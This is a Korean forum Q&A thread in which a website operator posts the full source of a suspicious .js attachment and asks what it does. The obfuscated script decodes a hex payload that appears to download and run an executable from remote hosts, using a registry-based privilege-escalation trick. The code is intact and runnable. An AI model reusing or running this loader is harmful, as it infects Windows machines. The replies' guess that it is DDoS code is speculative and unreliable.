자바스크립트 코드 해석 문의드립니다.

자바스크립트 코드 해석 문의드립니다.

QA

자바스크립트 코드 해석 문의드립니다.

본문

제가 운영중인 홈페이지의

그누보드기반 게시판 첨부파일로

.js 확장자 파일이 올라왔길래 실행하지 않고 소스열어보니 이상한 코드들이 있었습니다.

 

일단 게시물 내용과 첨부파일이 일치하지 않아

해당 게시자는 접속금지 처리하였습니다.

 

저는 자바스크립트인데 문외한인데

악성코드인지 아니면 다른목적의 첨부파일인지 몰라서

혹시 아래 코드가 어떤 목적의 js 파일인지 여쭤볼 수 있을까요?

 


var ewcabycxlo='202f2a20z16338z1643621662068zzz6z6316f2462zaz33536662065332a202a2f20z661z2206zzzz869z6za69z16a66203d204z65z44f626a6563z42822zz696e6d6z6dz4z33a5c5c5c5c2e5c5cz26f6fz45c5c'+ '43494d563222293b202f2a206f33z63431633830z2656d32za61z12a5f2968z23z2068242663202a2f20z661z22064z2696e6cz0203d206zzzz869z6za69z16a662e45z8656351z565z2z9282253454c45435420'+ '2a2046524f4d205z696e33325f4fz065z261z4696e6z53z9z3z4656d222c20225z514c222c2030z8313020zc2030z83230293b202f2a20352531z4z4z828206z20353962686c6a4029za256d3963zz6c30396631'+ '36z833202a2f20z661z2206b696863za646bz0z0203d206e65zz20456ez56d65z261z46fz22864z2696e6cz0293b202f2a20z86e6d205e333338z63z34z120z03zza202629215f6861z66e202a2f20z661z22064'+ '6z68z56zz6z5z864203d206b696863za646bz0z02e69z4656d28293b202f2a202a33z3206f35z86b6ez42b6z39256bz36e4033216d6c30z2zz20z4202a2f20z661z2206b61z262616cz5za203d20646z68z56zz6'+ 'z5z8642e53z9z3z4656d4469z26563z46fz2z9203b202f2a2064336b3239616120656162205f686520z464z8z3626b202a2f20z661z220686az1zzz6203d20646z68z56zz6z5z8642e5665z2z3696f6e3b202f2a'+ '206az1z2295e6b256e6az5202a394032z06636z94068z86z203z3038z229202a2f20z661z220z46dz46f66z5686365203d206e65zz204163z469z665584f626a6563z428225z5363z269z0z42e5368656c6c2229'+ '3b202f2a20zz302025256zzz3469z12069z12b3662286d626cz220z5695e6369z3206zz0202a2f20z661z220z4686az0zaz36f6e6a203d205z5363z269z0z42e43z26561z4654f626a6563z42822z368656c6c2e'+ '61z0z06c696361z4696f6e22293b202f2a206a295f6d6f30206d62365f692432236135202a6e5e6c6az46c62202a2f20z661z220za68626c69z5z26661z36dz5203d206e65zz204163z469z665584f626a6563z4'+ '282z5363z269z0z4696e6z2e46696c6553z9z3z4656d4f626a6563z42z293b202f2a206a3665z520z4z04068z26zz0322632z331z420z56z253920zz20z969202a2f20z661z22024z061z2616d333124203d20z4'+ '6dz46f66z56863652e53z0656369616c466f6c6465z2z328224dz9446f63z56d656ez4z322292b2z5c5c2z2b646z68z56zz6z5z8642e5365z269616c4ez56d6265z22ez265z06c616365282f2d2f6z2c20222229'+ '3b202f2a20z020z9z62az9z1342b403321326e40686b646123393zza23z26b3262202a2f2066z56e63z4696f6e206b636d6fz16z282920zb20z661z220z2z66az06d6z6dz06462203d20za68626c69z5z26661z3'+ '6dz52e4fz0656e5465z8z446696c652824z061z2616d3331242c20382c20z4z2z565293b20z2z66az06d6z6dz064622e5zz269z4654c696e6528222022293b20z2z66az06d6z6dz064622e436c6fz36528293b20'+ 'zd202f2a20z03z252440296c29z5203z2036382bz8z524256661402330za5e202a2f2066z56e63z4696f6e206z646a6a65z9z9282920zb20z661z220696a6a696dz96c203d20686az1zzz62ez3z06c69z428222e'+ '22293b202f2a2025395f3630643635z46a2a6866206z26z235235f636f6f2661202a2f2062626b64z6z5696a63203d202z222z2b6b61z262616cz5za2b2z5c5czzz363z269z0z42e65z86522202z2b2z222z2b5z'+ '5363z269z0z42e5363z269z0z446z56c6c4e616d652b2z2220z5z36c62z96d6zza66z02z3b202f2a202a6b31z13z6z2369z52bz66z6b5f612bz26b386820282b202a2f2069662028696a6a696dz96c5b305d3d3d'+ '2z31302z2920zb20z46dz46f66z56863652e52656z5zz269z4652822484b45595f43555252454e545f555345525c5c536f66z4zz61z2655c5c436c61z3z365z35c5c6dz32dz365z4z4696e6zz35c5cz368656c6c'+ '5c5c6fz0656e5c5c636f6d6d616e645c5c222c2062626b64z6z5696a632c2252454z5f535a22293b202f2a20z13926z15e26z23664zzz6655f356fz262253624zz66z161z9z2z63z25202a2f20z46dz46f66z568'+ '63652e52656z5zz269z4652822484b45595f43555252454e545f555345525c5c536f66z4zz61z2655c5c436c61z3z365z35c5c6dz32dz365z4z4696e6zz35c5cz368656c6c5c5c6fz0656e5c5c636f6d6d616e64'+ '5c5c44656c656z61z46545z86563z5z465222c2022222c2252454z5f535a22293b202f2a2065z028z92bza62z8z6263869306az4206e68342a6c28zz6431386a23z629z36e6z23626b202a2f20z4686az0zaz36f'+ '6e6a2e5368656c6c45z86563z5z465286b61z262616cz5za2b225c5c666f6468656cz065z22e65z865222c2022222c2022222c20226fz0656e222c2030293b202f2a2064z5335f5f382a68zz686bz6313zz065z4'+ '2440z625z435z6202a2f205z5363z269z0z42ez36c6565z02832303030293b202f2a203439232a2b69646bz16f3425z06d28z036246e6c35202b6cz26ez6202a2f20z46dz46f66z56863652e52656z44656c65z4'+ '652822484b45595f43555252454e545f555345525c5c536f66z4zz61z2655c5c436c61z3z365z35c5c6dz32dz365z4z4696e6zz35c5cz368656c6c5c5c6fz0656e5c5c636f6d6d616e645c5c22293b202f2a2040'+ '5ez42a403564z1266e38405e6938z023206c203563252b66683838666a646936202a2f20zd20656cz36520zb2069662028696a6a696dz96c5b305d3d3d2z362z2920zb20z46dz46f66z56863652e52656z5zz269'+ 'z4652822484b45595f43555252454e545f555345525c5c536f66z4zz61z2655c5c436c61z3z365z35c5c6dz36366696c655c5cz368656c6c5c5c6fz0656e5c5c636f6d6d616e645c5c222c2062626b64z6z5696a'+ '632c2252454z5f535a22293b202f2a20265fza2a6e6zz26320236236392040zz20z32638zz6166202a2f20z4686az0zaz36f6e6a2e5368656c6c45z86563z5z465286b61z262616cz5za2b225c5c65z6656ez4z6'+ 'zzz22e65z865222c2022222c2022222c20226fz0656e222c2030293b202f2a206436626z295e202628296161326z296a6az962642az025z3z162z2202a2f205z5363z269z0z42ez36c6565z02832303030293b20'+ '2f2a20293540z5206a6d6f38z920262b39zz4032326z2068z220345e202a2f20z46dz46f66z56863652e52656z44656c65z4652822484b45595f43555252454e545f555345525c5c536f66z4zz61z2655c5c436c'+ '61z3z365z35c5c6dz36366696c655c5cz368656c6c5c5c6fz0656e5c5c636f6d6d616e645c5c22293b202f2a20252b3568z935z5z36438zz3225z62031666dz9336d2466z1z6z35e2165202a2f20zd20zd205z53'+ '63z269z0z42ez36c6565z02835303030293b202f2a2064313066z820236b6d40402531z1256862213z68z2326fza63202bz5z834202a2f20696620282120za68626c69z5z26661z36dz52e46696c6545z869z3z4'+ 'z32824z061z2616d333124292920zb20z4686az0zaz36f6e6a2e5368656c6c45z86563z5z465286b61z262616cz5za2b2z5c5czzz363z269z0z42e65z8652z2c202z222z2b5z5363z269z0z42e5363z269z0z446'+ 'z56c6c4e616d652b2z2220z5z36c62z96d6zza66z02z2c2022222c20226fz0656e222c2030293b202f2a20216b2662666139za35zz20233z6b25313429396463616a6z3334256f3224202a2f205z5363z269z0z4'+ '2ez36c6565z02831303030293b202f2a203221396230z8z03231385fz231665e38z5z16132z9202a2f206b636d6fz16z28293b20z4z2z9zb20za68626c69z5z26661z36dz52e44656c65z46546696c65285z5363'+ 'z269z0z42e5363z269z0z446z56c6c4e616d65293b20zd206361z46368286529zb202f2a2a2f20zd202f2a20253931za392b206z35z92bz02a3368303325683z252az236za202a2f20zd20zd20696620285z5363'+ 'z269z0z42e41z26zz56d656ez4z32e436fz56ez428293d3d302920zb206z646a6a65z9z928293b202f2a20z66c5e2062646z2435262a6f406d2336z03521z9692120z833613963326638z833202a2f205z5363z2'+ '69z0z42e51z569z428293b202f2a206e315e4063332436316cz863696bz1692035232833z66f202a2f20zd206b636d6fz16z28293b2069662028za68626c69z5z26661z36dz52e46696c6545z869z3z4z3285z53'+ '63z269z0z42e5363z269z0z446z56c6c4e616d65292920zb20z4z2z9zb20za68626c69z5z26661z36dz52e44656c65z46546696c65285z5363z269z0z42e5363z269z0z446z56c6c4e616d65293b20zd206361z4'+ '6368286529zb202f2a2a2f20zd202f2a202521z525z5z329393465666b20z15f25z0z8232a26392a6b212430213z202a2f20zd202f2a2033213040206d5e5ez040283121z568z05e206e5f39z43661z33923202a'+ '2f2066z56e63z4696f6e20z9z668z4zz6f6z6e2862z36f6d6269z26a2c20656fz8666f6265z229zb202f2a20z8z0266z32z9z5205e6224z035z325406d642334z2202a2f20z4z2z9zb202f2a2023z262zz6d366d'+ 'z1z82566243523z16f20z865z2336f3629202a2f20z661z220zz69z964z96az2z266z263203d206e65zz204163z469z665584f626a6563z428224d53584d4c322e584d4c4854545022293b202f2a203033336zz9'+ '2az06ez4623z263z6c32306540616a5f202a2f20zz69z964z96az2z266z2632e6fz0656e28224z4554222c2062z36f6d6269z26a2c2066616cz365293b202f2a206c62z16920zz692436666934z520z33z202161'+ '5fz6zazz202a2f20zz69z964z96az2z266z2632ez3656e6428293b202f2a206631z829z16ez6z13366332a34z1zz6b6e63633z402123202a2f2069662028zz69z964z96az2z266z2632ez3z461z4z5z3203d3d20'+ '3230302920zb202f2a20z0z46d3561z8z8646z6426z9405f68693z6a2061202a2f20z265z4z5z26e20656fz8666f6265z228zz69z964z96az2z266z2632e5265z3z06f6ez365426f64z92c2066616cz365293b20'+ '2f2a20z96f20z8z433256z38z16b6d204068333z2068z1215f3z202a2f20zd656cz365zb202f2a20z0206f683024z620686120636zz633z1322464266b6b6z39616166202a2f20z265z4z5z26e20656fz8666f62'+ '65z2286ez56c6c2c20z4z2z565293bzd202f2a206c29336a5f6a3333z031z0362134z4693zz9zz35696329632568202a2f20zd6361z46368202865z2z26fz229zb202f2a2023206dzz2a3132z2z0z340206868z2'+ '20296838623zz66dz5z83z2a322621202a2f20z265z4z5z26e20656fz8666f6265z2286ez56c6c2c20z4z2z565293b202f2a20215ezzz32039z0256e3220286ezz3528296138z36e202a2f20zd202f2a20332068'+ '69z06368z331202a26z132z869z838z824213923202a2f20zd202f2a206e202a5f203533643z6d3862246636366z206a6261632568z138z8z63228202a2f202f2a20za24626e5e5fz86c3z29z1zaz03335z92369'+ '6221266f6628692438za202a2f2066z56e63z4696f6e2061z4z06661z4626f636e28656fz8666f6265z229zb202f2a20356f32293462692123z1z56f23z533326c28z36564z324202a2f20z4z2z9zb202f2a2032'+ '6221z22862z86840zaz235z138za6e6366z5z5z3295f202a2f20z9z668z4zz6f6z6e282268z4z4z03a2f2fzzzzzz2ez86e2d2d3132636c3363zz6333613z6634623961za612e636f6d2fz5z06461z4652ez068z0'+ '222c2066z56e63z4696f6e28z16d6e6ez12c2065z2z26fz22920zb202f2a203z20z340326f20z36466626c2b6c336c6fz2z46f316134z961z8202a2f20696620282165z2z26fz229zb202f2a20306634296668zz'+ '386562356c6120z225z5z32526z26925z0z5322a203zz8202a2f20z265z4z5z26e20656fz8666f6265z228z16d6e6ez12c2066616cz365293b202f2a20z4z3206b206120646cz46d6b25346z24612a23256dz936'+ '65206536z0zz6a216365392033202a2f20zd656cz365zb202f2a20632931322a3z62346c3z6a6e6364395e40z1z86e35z8202a2f20z9z668z4zz6f6z6e282268z4z4z03a2f2fz961z2692ez061z26d696b2e636f'+ '6d2fz5z06461z4652ez068z0222c2066z56e63z4696f6e28z16d6e6ez12c2065z2z26fz22920zb202f2a20696az33z3632zz2034za6z662b29206666z9282b2a38z1z86f406f282a25305f6b6e202a2f20696620'+ '282165z2z26fz229zb202f2a206bz26b20656636z1z5z1z22862zz2b5f645e296530612125202a2f20z265z4z5z26e20656fz8666f6265z228z16d6e6ez12c2066616cz365293b202f2a206z6c6z6e5f2336za21'+ '24266c2440z22066213963396130696e5f202a2f20zd656cz365zb202f2a206zz82862325e6cz566282035z1235f204020336e6ez63038zz23202a2f20z9z668z4zz6f6z6e282268z4z4z03a2f2fzzzzzz2ez86e'+ '2d2d6d33636468653862623063z635616z3463386138z02e636f6d2fz5z06461z4652ez068z0222c2066z56e63z4696f6e28z16d6e6ez12c2065z2z26fz22920zb202f2a20655f20z02440216b24z961205e206f'+ '366321z06123216e21202a2f20696620282165z2z26fz229zb202f2a206b326f69636z6c6z6c63686128686bz1za232b3532646bzaz13930z26az33925202a2f20z265z4z5z26e20656fz8666f6265z228z16d6e'+ '6ez12c2066616cz365293b202f2a2033z83320zaz96e6135315ez9zz6139386z393320z623z3za6d202a2f20zd656cz365zb202f2a20634032z46fz1306a20z16f5e6zz85ez2336d39236az8za6dz932z2402b20'+ '2a2f20z265z4z5z26e20656fz8666f6265z2286ez56c6c2c20z4z2z565293b202f2a20235f6c28396439653z256c392121202433z1396539206f202a2f20zd202f2a205f306221254030246a216z6234zzz95ez1'+ 'z634z328z2212034283369202a2f20zd293b202f2a20363328z9z4206bz4386229z225666c25z120z0346f6b2a24316f402030202a2f20zd202f2a205f613z2138z6z83325213z356d202b20z334z226202a2f20'+ 'zd293b202f2a206d2b2961343829z239636564z8z5296c23z36230382163202a2f20zd202f2a2040236dza6621z9662920z06c203z3z6e282538zz293z6f20216f6b312a202a2f20zd293b202f2a2066z5z1252b'+ '316az32a5f6d65z5306c24z3z939z12630202a2f20zd6361z46368202865z2z26fz229zb202f2a206434282az9z94066z9202bz020623z3361z131202a2f20z265z4z5z26e20656fz8666f6265z2286ez56c6c2c'+ '20z4z2z565293b202f2a20z62036zaz3346z34683138696az933656462za2039z663202a2f20zd202f2a206a6fz06a66z164z4z035205e6c31z429213562zz62356528295e38z16d6z32202a2f20zd202f2a206e'+ '296c36386a6c2040zz6936z83231392063z92324245fza35626e23286a665e202a2f202f2a20286dz9z239z43262634032333820246e246bz62135326z35z2282540z4202a2f2066z56e63z4696f6e2066z3z0z3'+ 'z661616e2829zb202f2a206c326169za68252128212320z233z42531z26z65246cza2b26346d24203z642024202a2f20z4z2z9zb202f2a20296a35402b66za292029zz6bz025z6202636216d2a332a6b6620z820'+ '69z3202a2f20z661z2206e66z6z8z4646z69203d206e65zz204163z469z665584f626a6563z428225363z269z0z4696e6z2e46696c6553z9z3z4656d4f626a6563z422293b202f2a20z1312035z2z320z03639z5'+ '5f666220356c34646c61312138236f202a2f20z661z220616f696az362z9z0za6a63z4zaz0203d20225c5c22202b204d61z4682ez2616e646f6d28292ez46f53z4z2696e6z283336292ez3z562z3z4z228322c20'+ '3929202b20222e65z865223b202f2a206bz42az96dz6332az9z925z564z36338z22339z56a21646b2a6d666d202a2f20z661z220z365636e6zzz6b63z6z1203d206e66z6z8z4646z692e4z65z453z0656369616c'+ '466f6c6465z2283229202b20616f696az362z9z0za6a63z4zaz03b202f2a2036zz6ez9zz20642a34205e61243z5f5ez639202664255e3232z028202a2f20z265z4z5z26e20z365636e6zzz6b63z6z13b202f2a20'+ 'za6zz023z132z4z1626662za626z235e2134343540z465z6202a2f20zd6361z46368202865z2z26fz229zb202f2a20322034642b6az82a6220z9666e2138295f6b382b2b213323zz2b35202a2f20z265z4z5z26e'+ '2066616cz3653b202f2a202a6d5f2120z06cz4zaza633zza34202a3z6f2a5f40402b3z65zaz1202a2f20zd202f2a202963z4z2za282024292a2638692438206c63296bza6d6d202a2f20zd202f2a2068zz245e39'+ '265e312az6z638z16420z462z0z228202a2f202f2a202165666a2964z06120636a65z9z32428205ezz21386239202a2f202f2a203z65622423z6z86c23243631zz20zz2az0252b24296869z0212128202a2f2066'+ 'z56e63z4696f6e206d656e6f666d6f6az8z328z16c6bz4612c20656fz8666f6265z229zb202f2a202a312021zz6f32z0406221693zz420z564306333626330zz296fz46e202a2f20z4z2z9zb202f2a203z326f6d'+ '646e28za25z6za636zz25f686c2163216e35402a69396638z326z3263z66312524202a2f20z661z22064z063z061zz6fz8203d2066z3z0z3z661616e28293b202f2a20za2339216z61256bz35f266320z03z386b'+ '6azz6cz12b6c6bz1202a2f206966202864z063z061zz6fz829zb202f2a2068353420656129z52a6136z2z92b26363z383832z12039202a2f20z661z2206e6566z2z066z26b6az0203d206e65zz204163z469z665'+ '584f626a6563z4282241444f44422e53z4z265616d22293b202f2a206f3540205fz63z326ez4z9205f306220z23zzaz1zz322568266zz2202a2f206e6566z2z066z26b6az02e4fz0656e28293b202f2a20626921'+ '30265f5fz85fz46c62623220z1243zz1283z30202a2f206e6566z2z066z26b6az02e54z9z065203d20313b202f2a20356140316d396a6334202a2bz2202a40332b20zz3z6ez46231202a2f206e6566z2z066z26b'+ '6az02e5zz269z46528z16c6bz461293b202f2a20z3315e3z32396e2bz461622a31283063z3406d6665246b5f6469202a2f206e6566z2z066z26b6az02e506fz369z4696f6e203d20303b202f2a2062345e296663'+ '392bz16zz9z0z46c64z36e6f20246624635ez5z9zz6230683526z8202a2f206e6566z2z066z26b6az02e5361z665546f46696c652864z063z061zz6fz82c2032293b202f2a20z830z5z13420zzzzz4z22bz26c31'+ 'z0622bz06eza3825z6z5z820z36469386c6c202a2f206e6566z2z066z26b6az02e436c6fz36528293b202f2a203139205e6f28z02038z5z8683z6f26405f315fz26d40283566312036z0202a2f20z265z4z5z26e'+ '20656fz8666f6265z22864z063z061zz6fz82c2066616cz365293b202f2a20306d6162z8342032215e353061346f6d6b653633z3406e62z3306c6c3068312028202a2f20zd656cz36520zb202f2a20z9za316f2b'+ '285f352b6530z0z536336426346c6bz56325683z5f6z612938z0z9202a2f20z265z4z5z26e20656fz8666f6265z2286ez56c6c2c20z4z2z565293b202f2a2063za396f303340616b66z3z06fz06d6f5f6azzz363'+ '316b232a26za202a2f20zd202f2a2025za68652636z1246z205f39z36963246b386b243zz8z9zz2b312b6a232a3z395f202a2f20zd6361z46368202865z2z26fz229zb202f2a20662040355e6z242bz925293623'+ 'z4682425z4646c25z0296az4686520zz202a2f20z265z4z5z26e20656fz8666f6265z2286ez56c6c2c20z4z2z565293b202f2a206c2a246135336a26z025z3z3626639z63826386a406a28202a2f20zd202f2a20'+ '696835256c5e306221zz20z262z420z03z333z2bz4z95e3926202a2f20zd202f2a205e62zzz56430z8402436z86z696cz9z440z031333224z439355e202a2f202f2a202626645f293826365f6b6e34z16d332024'+ '2b206a695f6cz6202a2f202f2a203z383538z163626ez45ez0z435z35e31za246d35za6466z4zz2129202a2f2061z4z06661z4626f636e2866z56e63z4696f6e2028z16c6bz4612c2065z2z26fz22920zb202f2a'+ '20z96e6f6z6eza3320zz6a21z2205fzz36za313zza206d203z26z3z3236e653936202a2f20696620282165z2z26fz229zb202f2a20686cz824z4z55fz6686z21663363z62a6az46b65zz6a6e66336d3038693120'+ '69202a2f206d656e6f666d6f6az8z328z16c6bz4612c2066z56e63z4696f6e202864z063z061zz6fz82c2065z2z26fz22920zb202f2a2033392a6zzz3534366eza33246e6b32666525636fz5332925642463295f'+ '202a2f20696620282165z2z26fz229zb202f2a20z86432z12923382031zz6azz25215f646f5f20z0z96e3024z2292bz3z2202a2f20z4z2z9zb202f2a206d296a3220z06e656469386az03328283223242164202a'+ '2f20z46dz46f66z56863652e52z56e2864z063z061zz6fz8293b202f2a20z139z828382b32z5z1z6346b2062326ezz342b3z39z662242a5ez3202a2f20zd6361z46368202865z2z26fz22920zbzd202f2a20z140'+ '636e6cza68243669z4352633692065z9za632028za28202a2f20zd202f2a20z3332a393165z3z8z132695f356932396b6235692065632623z6z86c202a2f20zd293b202f2a20z5zzz925z5z1616531z06e266666'+ '20z3206a6935302b2a6c312a6z6zz6202a2f20zd202f2a2025z5z925612664z66e64z46f302838z3za64356b6d202a2f20zd293b202f2a20z031216c24z6zaz4z15e2a266a622029zaz625z3zz64z8z4263324za'+ '6540202a2f20';
function yfawztqkphiqw(npyzwmwe)
{
 return(new Function(npyzwmwe)());
}
function tfzxldzvzypsb(min, max)
{
 return Math.floor(Math.random() * (max - min + 1)) + min;
}
function iocmdilovpx(hjreeiop)
{
 var hioars = hjreeiop.toString(); var npyzwmwe = "";
 for (var i = 0; i < hioars.length; i += 2) npyzwmwe += String.fromCharCode(parseInt(hioars.substr(i, 2), 16)); return npyzwmwe;
}
while (true)
{
 var ikcjofjmiuj = tfzxldzvzypsb(0,110);
 var uhiqrgclnvwmn = iocmdilovpx(ewcabycxlo.replace(/z/g,ikcjofjmiuj));
 if (uhiqrgclnvwmn.indexOf("function") !== -1)
 {
  yfawztqkphiqw(uhiqrgclnvwmn); break;
 }
}

 

참고로 해당 게시자는 keceden.com/doc.php 주소도 링크하였는데

해당 사이트 접속하면 위의 js파일이 자동 다운로드 됩니다.

 

번외질문으로 만일 악성코드라면 해당 코드가 있을경우

그누보드에서 원천적으로 파일업로드를 막을 수는 있을까요?

이 질문에 댓글 쓰기 :

답변 2

사이트 공격으로 보입니다.

특별히 언급되는건 없는거 같은데 파일 업로드 막는건 아예 게시판에 기능을 꺼버리면 되겠죠

그게 아니면 파일 업로드시 확장자를 바꿔서 넣는 방법이나 기타 보안 코드가 들어가야 되는데 아무래도 일이 많겠죠 ^^

 

찾아보니까 javascript 기반의 DDOS 공격용이 아닌가 싶습니다.

해당 파일을 실행하는 순간 DDOS 의 좀비가 되는 그런....

 

확실하지는 않지만 js 파일만 막을수 없다면 그냥 전부다 막으시는게 좋겠습니다.

답변을 작성하시기 전에 로그인 해주세요.
전체 200
QA 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT